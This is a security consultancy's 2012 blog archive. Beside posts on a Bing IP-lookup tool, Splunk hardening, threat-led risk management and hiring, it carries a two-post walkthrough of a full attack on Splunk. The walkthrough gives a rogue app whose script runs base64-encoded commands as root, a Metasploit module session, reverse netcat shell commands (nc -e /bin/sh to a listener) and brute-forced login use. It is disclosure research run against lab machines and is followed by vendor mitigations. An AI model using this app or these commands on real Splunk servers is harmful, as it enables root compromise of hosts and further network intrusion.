Tuesday, 18 December 2012

CLI Virtual Host Checker bingip


Google rocks, right? Well, there's still one feature it lacks compared to Bing – the ability to search by IP address.

On bing.com you can use ip:<IP address> and it will return pages indexed from that IP address which, for a security guy, is a really useful way of enumerating the virtual hosts belonging to a web server.

However, a fancy web page of results is not much use to the average penetration tester; we like text files which we can then pass into all sorts of other tools and scripts that we come up with.

There seem to be a few command-line tools which deal with gathering data from Google, but in my brief search on a BT5 instance there wasn't one which did what I wanted, so, as all good testers would, I wrote one.

bingip is a really simple tool that makes a request to bing.com to determine the domains hosted at a given IP, returning each in plain text on a new line.

It's a very simple script at the moment and can only handle up to 50 domains (due to the page limit on Bing – I will update it to use the API at some point) and, of course, it can break as soon as Bing change their website – but I'll try and keep on top of that.

CHRISTMAS UPDATE:
As it's Christmas we've added some new features to bingip.

It now accepts a file of IP addresses as input and, more usefully I think, it accepts an Nmap XML file too.


This means you can run your standard Nmap scans as normal and, when you're done, use bingip to find which websites are hosted on the target IP addresses.

A simple example would be:

nmap -p 80 -oX bingip_example.xml scanme.nmap.org

Now pass the file generated as an argument and bingip will automatically extract hosts with web server ports:


bingip.py --nmap_file bingip_example.xml 
74.207.244.221
--------------
scanme.nmap.org 
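Under the hood, extracting web hosts from Nmap XML is straightforward with Python's standard library. Here is a minimal sketch of the idea (not necessarily how bingip actually does it, and the list of ports treated as "web" is my assumption):

import sys
import xml.etree.ElementTree as ET

WEB_PORTS = {"80", "443", "8000", "8080", "8443"}   # assumed web ports

def web_hosts(nmap_xml):
    # Yield the address of every host with at least one open web port.
    for host in ET.parse(nmap_xml).getroot().iter("host"):
        address = host.find("address")
        if address is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if (port.get("portid") in WEB_PORTS
                    and state is not None
                    and state.get("state") == "open"):
                yield address.get("addr")
                break

if __name__ == "__main__":
    for addr in web_hosts(sys.argv[1]):
        print(addr)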


You can download the tool and see further examples over on our Github page at https://github.com/7Elements/bingip.

Wednesday, 14 November 2012

[Quick Post] Securing Splunk Free Authentication


Following up on my post earlier about abusing Splunk functionality, one of the issues Splunk administrators face when deploying the Free version is the lack of authentication. Here's a very quick and simple thought for anyone running it on Linux/Unix: bind SplunkWeb to localhost only and use SSH tunnels to access it.

It doesn't give you any kind of granularity over permissions within Splunk itself and it's not appropriate for all user types, but for systems/IT folk who, in my experience, make up a decent percentage of users, it could be a good option. It's likely they already have local OS accounts on the Splunk server anyway.

To configure Splunk to listen on localhost only, a simple change is required to the following file:

$SPLUNK_HOME/etc/system/default/web.conf

$SPLUNK_HOME is /opt/splunk by default. Uncomment and set the following configuration item as follows:

server.socket_host = localhost

Now restart SplunkWeb:

$SPLUNK_HOME/bin/splunk restart splunkweb

Check that it's listening as you expected using a quick netstat on the Linux box:

$ netstat -an | grep 8000
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN 

Nice. Now we need to SSH to the Splunk server and set up our tunnel. I'll give a quick example using OpenSSH; if you're a Windows user, PuTTY is your friend (other Windows SSH clients are available). On *your own* machine execute:

$ ssh -L8000:127.0.0.1:8000 splunk-linux.local

Authenticate as normal and your local port 8000 is forwarded to 127.0.0.1:8000 on the Splunk server so you can now access your Splunk Free instance by connecting to http://localhost:8000. This at least restricts access to valid users on the Linux server which is a big step up from the default. It's also more restrictive than (though works nicely in combination with) host-based firewalling on the server.

Abusing Splunk Functionality with Metasploit

In our post Splunk: With Great Power comes Great Responsibility we outlined how the sheer power and flexibility of Splunk can be abused to gain complete control of the server upon which Splunk is running. We ran through the creation of a custom application to upload through SplunkWeb, which facilitates OS command execution in the context of the Splunk OS user - which is root/SYSTEM by default.

Creating a custom application and manually specifying the arbitrary commands you wish to run is time consuming and unnecessary when we have powerful scripting languages and frameworks to do the legwork for us. Originally I developed a standalone Ruby tool, which I released and demoed during a Lightning Talk at BruCON 2012 (and literally wrote during some of the talks there). However, after a suggestion (read: constant harassment) from @ChrisJohnRiley, I have developed a module for the Metasploit Framework. A pull request has been submitted, so hopefully it will be included in the main Metasploit Framework. Until then you can clone it from the 7 Elements Github repository as follows (I'll assume you're running a Unix-based OS; you're on your own with Windows).

(Optional) Create a directory to store the 7E metasploit modules

$ mkdir -p ~/Development/7Elements
$ cd ~/Development/7Elements

Clone the code from our Github repository

$ git clone https://github.com/7Elements/msf_modules.git
Cloning into 'msf_modules'...
remote: Counting objects: 53, done.
remote: Compressing objects: 100% (30/30), done.
remote: Total 53 (delta 4), reused 44 (delta 3)
Unpacking objects: 100% (53/53), done.

Now set up your Metasploit to handle custom modules

$ cd ~/.msf4/
$ mkdir -p modules/exploits/multi/http
$ cd !!:2
cd modules/exploits/multi/http

Create a symlink to the code we cloned from 7E

$ ln -s ~/Development/7Elements/msf_modules/modules/exploits/multi/http/splunk_upload_app_exec.rb .

With that done, we can fire up Metasploit and begin exploitation. I am going to attack a local Debian VM which is running a default installation of Splunk 5 (latest version at time of writing) with the Free license activated.


$ msfconsole 

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 983 exploits - 531 auxiliary - 162 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops

msf > use exploit/multi/http/splunk_upload_app_exec 
msf  exploit(splunk_upload_app_exec) >

Let's have a look at the options available.

msf  exploit(splunk_upload_app_exec) > show options

Module options (exploit/multi/http/splunk_upload_app_exec):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   PASSWORD         changeme         yes       The password for the specified username
   Proxies                           no        Use a proxy chain
   RHOST                             yes       The target address
   RPORT            8000             yes       The target port
   SPLUNK_APP_FILE                   yes       The "rogue" Splunk application tgz
   USERNAME         admin            yes       The username with admin role to authenticate as
   VHOST                             no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Universal CMD


msf  exploit(splunk_upload_app_exec) > show advanced 

Module advanced options:

   Name           : CommandOutputDelay
   Current Setting: 5
   Description    : How long to wait before requesting command output from Splunk 
      (seconds)

   Name           : DisableUpload
   Current Setting: false
   Description    : Disable the app upload if you have already performed it once

   Name           : EnableOverwrite
   Current Setting: false
   Description    : Overwrites an app of the same name. Needed if you change the app 
      code in the tgz

   Name           : ReturnOutput
   Current Setting: true
   Description    : Display command output


As discussed, exploiting this feature requires an admin-level user in Splunk. The username and password are preset to admin and changeme, which are the Splunk defaults. On the Free license it actually doesn't matter as there's no authentication anyway.

You will need to set SPLUNK_APP_FILE. By default the module will look in the main Metasploit data folder for the provided tar.gz app, which means that if it ever makes it into the main trunk you won't need to change this. For now we set it to the tar.gz provided in the msf_modules directory.

We also set our target (RHOST), our payload (in this case a reverse netcat shell) and the address for the payload to connect back to (LHOST). Everything else we can leave as default.

msf  exploit(splunk_upload_app_exec) > set RHOST splunk-linux.local
RHOST => splunk-linux.local
msf  exploit(splunk_upload_app_exec) > set SPLUNK_APP_FILE /Users/marc/Development/7Elements/msf_modules/data/exploits/splunk/upload_app_exec.tgz
SPLUNK_APP_FILE => /Users/marc/Development/7Elements/msf_modules/data/exploits/splunk/upload_app_exec.tgz
msf  exploit(splunk_upload_app_exec) > set PAYLOAD cmd/unix/reverse_netcat 
PAYLOAD => cmd/unix/reverse_netcat
msf  exploit(splunk_upload_app_exec) > set LHOST 172.16.125.1
LHOST => 172.16.125.1

Now we exploit :-)

msf  exploit(splunk_upload_app_exec) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.125.1:4444 
[*] Using command: nc 172.16.125.1 4444 -e /bin/sh 
[*] authenticating...
[*] fetching csrf token from /en-US/manager/launcher/apps/local
[*] uploading file upload_app_exec.tgz
[*] upload_app_exec successfully uploaded
[*] fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
[*] invoking script command
[*] waiting for 5 seconds to retrieve command output
[*] Command shell session 1 opened (172.16.125.1:4444 -> 172.16.125.134:47893) at 2012-11-13 15:37:07 +0000
[*] fetching job_output for id 1352821067.8
[*] command returned:

msf  exploit(splunk_upload_app_exec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root)


The usual post-exploitation can now ensue of course. On a recent test I used this method to compromise a host which, among other things, turned out to be running the TACACS+ service for the network. I gained enable access to all Cisco devices in the environment.


In the previous post I also showed how you can retrieve the output from commands. The example I gave was against an Enterprise install running on Windows Server 2008 R2. Let's pop that puppy with our Metasploit module too.

msf  exploit(splunk_upload_app_exec) > set RHOST splunk-windows.local
RHOST => splunk-windows.local
msf  exploit(splunk_upload_app_exec) > set USERNAME marc
USERNAME => marc
msf  exploit(splunk_upload_app_exec) > set PASSWORD Password100
PASSWORD => Password100
msf  exploit(splunk_upload_app_exec) > set PAYLOAD generic/custom 
PAYLOAD => generic/custom
msf  exploit(splunk_upload_app_exec) > set PAYLOADSTR cmd.exe /c systeminfo
PAYLOADSTR => cmd.exe /c systeminfo

Now exploit!

msf  exploit(splunk_upload_app_exec) > exploit
[*] Using command: cmd.exe /c systeminfo
[*] authenticating...
[*] fetching csrf token from /en-US/manager/launcher/apps/local
[*] uploading file upload_app_exec.tgz
[*] upload_app_exec successfully uploaded
[*] fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
[*] invoking script command
[*] waiting for 5 seconds to retrieve command output
[*] fetching job_output for id 1352823090.12
[*] command returned:
msf  exploit(splunk_upload_app_exec) > 

Oh dear. What happened there? The command didn't return any output. Splunk uses an internal job scheduler to process commands, so the way we retrieve output is by polling the job control service for any output returned. By default we do this 5 seconds after we execute the script, but some commands take longer than that to return. systeminfo, as most of you will know, is not a fast command.

The solution is to increase the time the module waits before it asks for output using the advanced option CommandOutputDelay. Let's try 10 seconds:

msf  exploit(splunk_upload_app_exec) > set CommandOutputDelay 10
CommandOutputDelay => 10
msf  exploit(splunk_upload_app_exec) > exploit

[*] Using command: cmd.exe /c systeminfo
[*] authenticating...
[*] fetching csrf token from /en-US/manager/launcher/apps/local
[*] uploading file upload_app_exec.tgz
[*] upload_app_exec successfully uploaded
[*] fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
[*] invoking script command
[*] waiting for 10 seconds to retrieve command output
[*] fetching job_output for id 1352823591.13
[*] command returned:
Host Name:                 IIS1
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00477-001-0000421-84537
Original Install Date:     25/08/2012
System Boot Time:          12/11/2012
System Manufacturer:       VMware
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
...snip...

Ah. That's better.

Splunk: With Great Power Comes Great Responsibility

Splunk background

Splunk is a fantastically powerful solution to "search, monitor and analyse machine-generated data by applications, systems and IT infrastructure" and it's no surprise that many businesses are turning to it in order to help meet some of their compliance objectives. Part of Splunk's power comes from its query language and custom application capability. If a user wants to enhance the features of Splunk, maybe to parse and group disparate log entries together into a transactional view, this can all be done. On top of this, a healthy marketplace for Splunk Apps has grown up on the SplunkBase community website.

Splunk Applications

Splunk Apps are a collection of scripts, content and configuration files in a defined directory structure which is then uploaded to the Splunk server for addition to the App list. This gives authorised users access to the queries and actions that the App can perform. To upload an App through the web interface, the Splunk user requires (by default) the 'admin' role.


A bit more power than you bargained for?

Splunk offers a very powerful search command called script, which allows admin-level Splunk users to make "calls to external Perl or Python programs". This is very useful for a number of reasons but is particularly interesting to an attacker who has gained administrative access to a Splunk server.

Nothing new here really. Lots of apps allow authenticated users to upload custom content and every one of them is potentially vulnerable if they do not adequately ensure that this cannot be abused. The main difference with Splunk is two-fold in my opinion.

Firstly, by default Splunk runs as root (on Unix, LocalSystem on Windows). This is far better from an attacker's perspective than, for example, the web server user.

Secondly, in the free version of Splunk there is no authentication at all and it logs you directly in as admin. The Enterprise version does provide authentication and granular permission control. However, as disclosed by Sec-1 in November 2012, it does not protect against brute-force attacks on the login page, which leaves it vulnerable. I verified this against the recently released version 5 with a simple Burp Intruder attack. As you can see, password attempt 100 succeeds.


Splunk runs over HTTP not HTTPS by default, though HTTPS is a simple click away (more on that later). This means there is also a risk of credential capture over the network by a suitably placed Man-In-The-Middle.

Summarising quickly, what we have here is a "feature", not a vulnerability; however, as you will see, Splunk has powerful functionality which can be abused with significant security implications.

Splunk, out of the box:

1) Allows the definition of custom applications
2) Custom applications can execute arbitrary python or perl scripts
3) Runs as root (or SYSTEM) by default

What could possibly go wrong? We're about to find out.

Building a "rogue" Splunk App

Splunk Apps can be very complicated affairs with the possibility of hooking into the SplunkWeb MVC framework to define custom controllers and views for rendering your data. Our needs are actually very modest so we will create the minimum required for our goal: arbitrary OS command execution.

Splunk Apps are installed to $SPLUNK_HOME/etc/apps on the Splunk server. Each app has its own directory, usually named after the app. There are three ways to get an App onto a Splunk server:

1) Manually copy to $SPLUNK_HOME/etc/apps
2) Install from SplunkBase through the SplunkWeb UI
3) Define or upload through the SplunkWeb UI

Option 1 is obviously not available to us at this stage; if we had this kind of access and privilege on the server already we likely wouldn't need this attack.

Option 2 is an interesting potential attack vector which I plan to explore in the future. I do not know what checks are made by Splunk when you submit an app to SplunkBase. Analogous to the smartphone app stores, there is a great risk associated with installing arbitrary code into your environment, particularly when, as we demonstrate in this post, it runs with such privilege by default.

The Splunk Developer Agreement certainly seems to know what's possible; it states:

(d) Your Application will not contain any malware, virus, worm, Trojan horse, adware, spyware, malicious code or any software routines or components that permit unauthorized access, to disable or erase software, hardware or data, or to perform any other such actions that will have the effect of materially impeding the normal and expected operation of Your Application.

A topic for another day perhaps.

So, Option 3 it is then. You can manually define the files through the UI but that's slow. The easiest way is to create the folder structure and files locally, then produce a tar.gz archive from it and upload.

We will create an app called upload_app_exec. It will contain the following:


upload_app_exec
upload_app_exec/bin
upload_app_exec/bin/pwn.py
upload_app_exec/default
upload_app_exec/default/app.conf
upload_app_exec/default/commands.conf
upload_app_exec/metadata
upload_app_exec/metadata/default.meta

app.conf - defines information about the app, including version number and visibility in the UI. This is important for our attack later.


[launcher]
author=Marc Wickenden
description=With great power....
version=1.3.3.7

[ui]
is_visible = true

commands.conf - This defines the name of our command to pass to "script" in Splunk, tying our arbitrary Python or Perl script to the Splunk UI:
[pwn]
type = python
filename = pwn.py
local = false
enableheader = false
streaming = false
perf_warn_limit = 0

default.meta - For our purposes, this defines the scope of our commands. We export to "system", which basically means all apps:
[commands]
export = system

pwn.py - The meat and potatoes. This is our arbitrary Python script which Splunk will run. It could be even simpler than what I have defined here; however, by using the splunk.Intersplunk Python libraries provided we are able to capture output from executed commands and present it back to Splunk cleanly.
As you can see, we pass in a single argument which is a base64-encoded string (easier, as it avoids browser encoding issues and the need to handle multiple arguments here or in Splunk).

import sys
import base64
import splunk.Intersplunk

results = []

try:
        # Decode the base64-encoded command supplied as the first script
        # argument and run it via os.system (reached through sys.modules).
        sys.modules['os'].system(base64.b64decode(sys.argv[1]))

except:
        # On any failure, return the full traceback to Splunk as an error result.
        import traceback
        stack = traceback.format_exc()
        results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))

# Hand the results (empty on success) back to Splunk for display.
splunk.Intersplunk.outputResults(results)

With everything in place we simply tar/gzip this directory up, ready for upload.

$ tar cvzf upload_app_exec.tgz upload_app_exec
a upload_app_exec
a upload_app_exec/bin
a upload_app_exec/default
a upload_app_exec/metadata
a upload_app_exec/metadata/default.meta
a upload_app_exec/default/app.conf
a upload_app_exec/default/commands.conf
a upload_app_exec/bin/pwn.py

Now we head over to our Splunk system to complete the upload. I will demonstrate this with a default installation of the latest (at time of writing) version 5 of Splunk on a Debian 6 box. The only thing I have configured in Splunk is activating the Free license rather than the default trial Enterprise license.

For completeness I simply ran:

dpkg -i splunk-5.0-140868-linux-2.6-intel.deb
/opt/splunk/bin/splunk start

Uploading the App

Open your browser and type in the address for your target Splunk instance. In this example my Debian box is splunk-linux.local on the default port of 8000. By default you will be greeted by the launcher app.

1) Click on the Apps menu on the right-hand side.
2) Click "Install app from file" and select the tar.gz we created in the previous steps.
3) You should receive a message to say the app installed successfully. Now access it from the App dropdown menu at the top right of the screen.
4) You will be presented with the timeline interface for our new app.
Exploitation

If you recall from earlier, our command will be supplied as a base64 encoded string. For this demonstration I will pop a reverse netcat shell to my waiting listener. Generating base64 is a doddle but just in case you want some command-line fu:

OS X/Linux:

$ echo -n 'nc -e /bin/sh 172.16.125.1 4444' | base64
bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==

Windows Powershell:

PS> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('nc -e /bin/sh 172.16.125.1 4444'))
bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==

Now set up a listener for our netcat reverse shell on port 4444 with:

$ nc -vln 4444

Finally, time to trigger the command execution and get our shell. In the Splunk search box type the command to pipe the search results (which are irrelevant to us) to our script command:

* | script pwn bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==

Profit:


We can also return the output of a command to Splunk for display in the browser. This time I will demonstrate using Splunk for Windows, just to show it's a universal problem. Again this is a default installation of Splunk 5, on Windows Server 2008 R2, except this time with an Enterprise license.

Upload the same app as before, but this time we will issue the systeminfo command, which will run as NT AUTHORITY\SYSTEM.
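The search itself is the same shape as the Linux example; the argument is just the base64 encoding of cmd.exe /c systeminfo, generated with the same one-liners shown earlier:

* | script pwn Y21kLmV4ZSAvYyBzeXN0ZW1pbmZv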

Automation

The process itself is very simple, but wouldn't it be even better if some kind soul had developed this functionality for the Metasploit Framework? It's your lucky day: head on over to the second blog post in this series for all the details: Abusing Splunk Functionality with Metasploit.


Fixing it

Splunk have been contacted for advice on this threat but have so far not responded. We will update this blog with their official response as and when we receive it.

UPDATE: 15th November 2012
Fred Wilmot at Splunk has been in touch with me and we've had a really good chat about this. He sent me an email addressing each of the points in this post. What is also clear is that Splunk are committed to doing things the "right way". Fred has some great ideas he's working on so hopefully these will come to fruition. I have included Splunk's response at the end.

In the meantime we would suggest that, at a minimum, Splunk administrators implement the advice in Splunk's hardening guide at http://wiki.splunk.com/Community:DeployHardenedSplunk. This will result in an installation which does not run as a privileged user and switches SplunkWeb to use HTTPS. These steps don't directly address the threat of arbitrary command execution however. Depending on the target of the attack and other implementation details, getting access to a "splunk" user may be enough. Think "data oriented" or "goal oriented" rather than assuming root is required.

I have not been able to identify a way to disable the script command. The main splunkd process is a compiled executable, but a lot of the functionality of Splunk is written in Python so there may be a simple way to comment out or redefine the pertinent parts of the application. This would, however, be a hard sell to most organisations, and rightly so, particularly Enterprise customers who pay handsomely for their annual support contracts.

I wonder also if Linux/Unix users could chroot the installation without losing functionality. This may be the strongest mitigation available.

For now it seems the best advice we can give is to ensure that no Free licence deployments of Splunk are available on a network which contains sensitive data; that credentials at an OS level are not shared between Enterprise deployments and Free versions, particularly for accounts with the admin role; and that users with the admin role are reviewed regularly and privileges reduced to least privilege. All the usual good advice, basically.

If Splunk come back to us with any further advice we will update this post accordingly. I'm particularly interested in the answer to another question I asked them: which other commands or functionality can be (ab)used in this way. If you think of any please add a comment.

END OF ORIGINAL POST

Response from Fred Wilmot at Splunk:


We wanted to respond to your blog post, which I enjoyed reading all three sections.   You express some valid concerns if best practices are not followed.  Let me try to summarize:

Threat Model:
1) Default Splunk runs as root (on Unix, LocalSystem on Windows).
2) No authentication mechanism other than Splunk, default login is administrative
3) lack of HTTPS by default, leaves Splunk cred susceptible to MitM.
4) Potential for data oriented compromise using another Splunk user account.

* create roles and map capability to user based on least privilege (which is default 0 for new accounts)


Exploitation:
We certainly are aware of the power of the features of Splunk, and if standard security best practices are bypassed like: privileged local account access, running Splunk as root, and using the free version of Splunk w/o an auth scheme, you have the opportunity to execute scripts  using Splunk and python libs for code execution. 

We designed Splunk to allow roles to add applications both through the User Interface as well as the file system through access.  We also completely agree that the free version's method of authentication is NOT designed for enterprise use, and suggest the primary use case is enabling folks to get used to core Splunk with a volume of daily ingest license as the limiter.   Anyone with the ability to run root, owns the box, and hence, all things.  If we install an app under that context, the same functionality applies.  

Mitigation:
Here are some ways/means to add some controls around feature function-
1) If authenticating to Splunk, use SSL as a standard function when possible, in conjunction with LDAP authentication.  Generate your own keys, don't use Splunk's default keys as well.
2) Provided we follow a roles-based access control approach, we can also limit who is capable of authenticating as a role to Splunk, and thereby what they can do as a function of product features.  this includes searches, views, applications, and many of the administrative functions for running Splunk.
3) We can configure commands.conf to prevent script export to anything outside the application it runs in, including passing authentication as a function of the custom python script.  
4) We can also configure default.meta to add additional controls around the application itself. *.meta files contain ownership information, access controls, and export settings for Splunk objects like saved searches, event types, and views. Each app has its own default.meta file.

5) We can also limit splunk Restrict Search Terms and capabilities specifically.  This can include search parameters aside from script.
6) Do not run Splunk as root.  this is documented for our customers, and a recommended best practices.
7) Do not use the default 'Admin' role for normal usage, create both roles and users in Splunk to assign controls to authorized users. we suggest tying an authentication mechanism such as LDAP or AD.
8) Do not use Splunk authentication as a method for access control in production.
9) MiTM credential attacks happen when not using SSL.  and brute forcing happens w/o strong authentication. Configure Splunk to use SSL and LDAP to mitigate these risks.


From our community Wiki, as you followed, we also include some hardening practices as well.

As a vendor committed to product security, both responsible disclosure practices, best practices and guidance can also be found here.


Suggestions:
I do see an opportunity to limit the capability of script execution as an additional control we can place in the roles capability to limit arbitrary code execution by anyone at the Splunk Application level.  Maybe we limit script loading except through the UI for all non 'Admin' roles? Perhaps assigning a GUID to a script specifically might add granularity here as well. We also have a functionality to monitor and audit user interactivity within Splunk.  We, of course, Splunk that too.

You asked about some operations that may have interesting impacts as you describe with 'script' command, I might suggest the nature of the feature itself allows for this, and should be used with due care, change control, and audit for visibility into add/change/mod.  We designed Splunk to allow folks to upload/download apps to Splunk as a platform from our splunk-base.splunk.com, as well as the community to contribute their context for Splunk as a platform with their applications they have created.

As you said, with great power comes great responsibility; we are very open to suggestions, and feedback on the product.  Thank you very much for both the candor and the feedback, looking forward to hearing more from you.

Best regards,
Fred

Fred Wilmot, CISSP
Security Practice Manager 

Tuesday, 9 October 2012

Threat: The Missing Component.



It is now widely acknowledged that risk management is the best way to manage security, and security risks are beginning to be integrated into organisations' business risk management structures so that they are managed alongside other business risks. This is a significant step forward, but a component is frequently missing from the security risk equation: threat. While there is no easy fix for this, this blog sets the scene and explains why threat is an integral part of the overall risk management approach.

What is Threat?

There are many definitions of a threat, but within the context of security risks we will use the following:

An actor that has the intent and capability to carry out an act that could cause harm to an organisation.  

In some instances this is referred to as the cause of a risk. A threat must possess both the intent and capability to carry out the act, and these two elements can be used to assess the size of a threat to an organisation.

In this context, the threat is a wilful actor that chooses to undertake the act.

Threats are not the only cause of risks though.  Some risks may be caused by circumstances or events that do not possess intent or capability, such as adverse weather.  These are referred to as hazards.

Hazards are rarely, if ever, a direct cause of a security risk and as such will not be covered in this blog.

Where does Threat fit into the risk equation?

Again, there are many definitions of a risk but we will use the following:

Any uncertain event that could have an impact on an organisation’s ability to achieve its business objectives.  

These overarching definitions of risk clearly demonstrate the link between the risk and a business's objectives, but they don't describe what factors come together to make a risk. The following formula lays out the series of key factors required to cause a security risk. Threat is a key component of this.

A THREAT exploits a VULNERABILITY that causes an EVENT that has an IMPACT on the business. 

The terms used above are all standard entities used in risk management and, whilst real life is never that simple, most security risks follow the above formula in theory.

Why is Threat important?

A threat initiates a risk. It is not until a threat exploits a vulnerability that an event that impacts a business will occur. Without the threat, the sequence of events will not be triggered and the consequences will not occur.

Organisations do not need to have knowledge of a defined threat to identify and manage a risk.  The fact that a vulnerability exists, which a threat could exploit, is normally sufficient for an organisation and the threat element is ignored.  The threat though contains a large number of variables that will determine the evolution of the event and its subsequent impact.  The threat determines the timing, nature, size and velocity of an event.

It is these variables that give rise to the uncertainties of the event and therefore its subsequent impact.  A defined and understood threat therefore provides additional information on the security risk that can be used to refine and target controls.

Why is Threat frequently not taken into account?

Despite its clearly important role, threat is often missed out from organisations’ risk management processes.  Threats are difficult to define.  They exist outside of an organisation and therefore the information is difficult to obtain.  In addition, organisations can rarely influence or control a threat, without great cost.

Organisations therefore focus on the internal picture, identifying and managing vulnerabilities, which, given the premise that any vulnerability a threat could exploit should be protected, they have to do anyway.

Whilst understandable, for me this misses out a key part of risk management. So, how do we take threat into account in the risk management process?

Threat Led Risk Management

The point of risk management is to understand the things that might prevent you from achieving your objectives, and to manage them. It is about information and truly understanding the context in which you operate, to stop the unforeseen things which exist outside of your plan from preventing you achieving your goals. In this context, the threat is a vital part of the jigsaw puzzle as it provides much greater clarity on the likelihood of a risk occurring and the potential impact. Whilst risks can therefore be defined using the organisation's vulnerability and potential impact, a risk cannot be truly quantified without taking into account the threat. We have termed this Threat Led Risk Management.

Threat Led Risk Management enables organisations to truly undertake risk management. This of course leaves organisations with a real problem: how do they get the information on threat that they need at a reasonable cost?

Threat Information

Gathering current and accurate information on the threats to a business or organisation is a difficult task. The information is not easily obtained and, in respect of security risks and the likely perpetrators, information on the threat is naturally guarded. For an organisation to gather information on the threats it faces and keep that information up to date, it would need to develop an effective intelligence network with sufficient sources of information to meet its needs, as well as have the capacity to analyse that information. For the majority of organisations this is unachievable.

The resource implications alone are likely to act as a barrier but in addition, the time it would take to establish an effective intelligence network is likely to prevent organisations from going down this route.  In addition, organisations in similar sectors will be replicating work, in effect all seeking the same information and applying it to their businesses.

From a UK plc point of view this is a huge waste of resource to protect our businesses.


A Possible Way Forward

Organisations can obtain threat information from private companies that provide bespoke threat products, but there is no guarantee on quality and those with good reputations are expensive. However, rather than individual organisations undertaking essentially the same intelligence-gathering exercises on the same threats, a central, non-competitive system that produces an industry-sector-specific threat report would provide a cost-effective solution to enable organisations to undertake Threat Led Risk Management. Perhaps this is a role that could be undertaken by the UK Government.

The UK Government is currently seeking to strengthen the business sector's resilience to attack, particularly in the area of what it calls cyber threats, and has also asked for innovative ideas on identifying and tackling the threat (summarised by the BBC). The Government's current focus, though, appears to be on obtaining the information to enable it to act, rather than on sharing threat information. Whilst the Centre for the Protection of National Infrastructure (CPNI) does work with private organisations and provide security advice, no formal industry-specific threat product exists.

The UK Government already has a system and structure in place able to gather intelligence on threats. It is acknowledged that the UK Government will not be able to share the majority of information on threats, and it is not suggested that private companies are given access to all of it. However, the information could be used to provide a centralised, industry-sector-specific threat product that would enable organisations to better manage their security risks.


Thursday, 13 September 2012

44Con Burp Plugin Workshop Slides and Code available

44Con 2012 has been and gone and attendees seem to agree it was a huge success. I was proud to present my Burp Plugin Development for Java n00bs workshop at the event and on the whole I think it went well.

The demo gods weren't smiling on me, which meant there was less audience participation than I had envisaged, but in the end we ran over our two-hour slot by fifteen minutes with just me talking and working through the demos, so it was probably just as well!

I've published the slides on Google Presentations. Most of the content was me talking, so make sure you check out the speaker notes as much of the detail is there. I've also included links to the code, which is available on our Github page.

The slides are at https://docs.google.com/presentation/d/1vs1dJw646pmooJ6D2JbJk6nE84aPBquPALA86lzSb-Y/edit and the code is available at https://github.com/7Elements/burp_workshop.

If you want to play along at home you will also need to set up an IIS Application Server and install the WCF service from the RepeatAfterMe folder. This also requires the NOEMAX WCF-Xtensions .NET assemblies available from http://www.noemax.com/downloads/wcfx/wcfx_trial.asp.

You will need to edit the app.config file in the RepeatAfterMeClient to point to the correct location for your IIS server. Change the following section:

<client>
    <endpoint address="http://192.168.239.141/RepeaterService.svc" binding="extensionBinding" bindingConfiguration="BasicHttpBindingExtended" contract="IRepeaterService" name="BasicHttpBinding_IRepeaterService"/>
</client>


If you have any questions regarding all of this, feel free to shoot me a message on Twitter.

Wednesday, 12 September 2012

We're hiring!


To help us find the right people, we wanted to give you more information about 7E as a company and what it is we are looking for. 

So what are we about?
Well firstly, we're going from strength to strength.  We aim to improve the way the industry approaches information security and to make a real difference. We deliver high quality technical testing that enables our clients to receive the assurance they need.

We take pride in our approach to customer service and have built an excellent reputation in the delivery of innovative and pragmatic security testing. We deliver a wide variety of engagements and therefore there is always something new to get involved with. Our clients cover multiple business sectors, from small niche providers to large multinational blue-chip organisations and we treat all of them with the same level of dedication.

How do we do this?
We do all of this by putting our clients at the heart of everything we do. Exceptional customer service and delivering high quality products and services every time are central to the way in which we work. Our staff use their technical knowledge to tailor each engagement to the client’s needs and are able to translate technical issues into clear business related impact.

What does it take to work for us?
We are looking for individuals who are technical 'geeks', have a passion for security, but also have that something extra - wanting to make a difference.

Is this you?
If you are motivated in this way, then we want to hear from you. We passionately believe in what we do and if you share this vision then we can offer you the following:
  • Dedicated Time For Research / Training - A minimum of three days each month to work on research and personal training. If you have an innovative / interesting research idea then we will support the required effort to deliver.
  • No Sales / Delivery Targets - We don't have sales or delivery targets at 7 Elements. It is not about selling days, but delivering what the client requires.
  • Work-Life Balance - We believe strongly in a work-life balance, as such all of our staff get 30 days annual leave.
  • Development - We take great pride in providing on-going tailored support and development for our team. You can expect to receive individual training plans as well as attendance at conferences throughout each year.


Sign me up!
For further information or to apply then please send an email to jobs@7elements.co.uk.


7 Elements does not accept agency CVs and will not be held responsible for any fees related to unsolicited CVs.




Tuesday, 28 August 2012

7 Elements to run 44Con Burp Suite Workshop

